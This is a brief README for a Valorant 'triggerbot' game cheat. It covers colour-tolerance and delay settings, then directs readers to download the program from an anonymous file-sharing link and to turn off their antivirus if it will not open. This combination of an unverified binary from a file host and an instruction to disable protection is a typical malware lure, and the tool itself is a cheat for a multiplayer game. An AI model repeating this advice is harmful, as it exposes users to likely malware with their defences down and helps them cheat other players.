mufinatko/Fastest-Valorant-Triggerbot/README.md

 Should work

 Additionally you can change the color tolerance, I recommend 20-70, also a delay can be added, => config.json

+if there is no release then download it from [https://filetransfer.io/data-package/v1MZFUik#link](https://filetransfer.io/data-package/v1MZFUik/download)

+and if the trigger bot doesnt open just turn off your anti virus